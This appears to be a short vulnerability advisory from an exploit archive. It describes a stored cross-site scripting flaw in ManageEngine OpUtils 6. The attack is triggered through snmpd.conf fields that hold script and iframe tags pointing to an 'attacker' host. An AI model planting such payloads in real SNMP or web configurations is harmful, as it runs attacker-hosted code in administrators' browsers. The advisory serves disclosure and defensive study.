29 lines
No EOL
1.4 KiB
Text
29 lines
No EOL
1.4 KiB
Text
# Author: loneferret of Offensive Security
|
|
# Product: ManageEngine OpUtils
|
|
# Version: 6
|
|
# Vendor Site: http://www.manageengine.com
|
|
# Software Download: http://www.manageengine.com/products/oputils/download.html
|
|
|
|
# Software Description:
|
|
# http://www.manageengine.com/products/oputils/oputils.html
|
|
# The toolset can be used to troubleshoot the frequent network problems such as network
|
|
# connectivity, availability, performance, health, and latency of any IP node in the network.
|
|
# It provides desktop details like CPU, Disk space information, installed software,
|
|
# process information and other vital metrics. Readymade tools to manage DNS names,
|
|
# IP and MAC addresses are also available. SNMP tools are included to help monitor
|
|
# any SNMP-enabled IP node. Graphs, charts, and tables offer real-time views of
|
|
# the network and system information. Results can be exported as reports in various
|
|
# formats like PDF and HTML.
|
|
|
|
# Vulnerability:
|
|
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
|
|
# JavaScript file
|
|
# ..
|
|
# syslocation <script src="http://attacker/xss.js"></script>
|
|
# syscontact <iframe src="http://attacker/something.html"></iframe>
|
|
|
|
#
|
|
# Adding the target machine either via a network scan or manually by adding the IP to the host list
|
|
# ManageEngine monitors. When a SNMP Scan is initiated, we are presented with a couple of
|
|
# nice alert boxes.
|
|
# |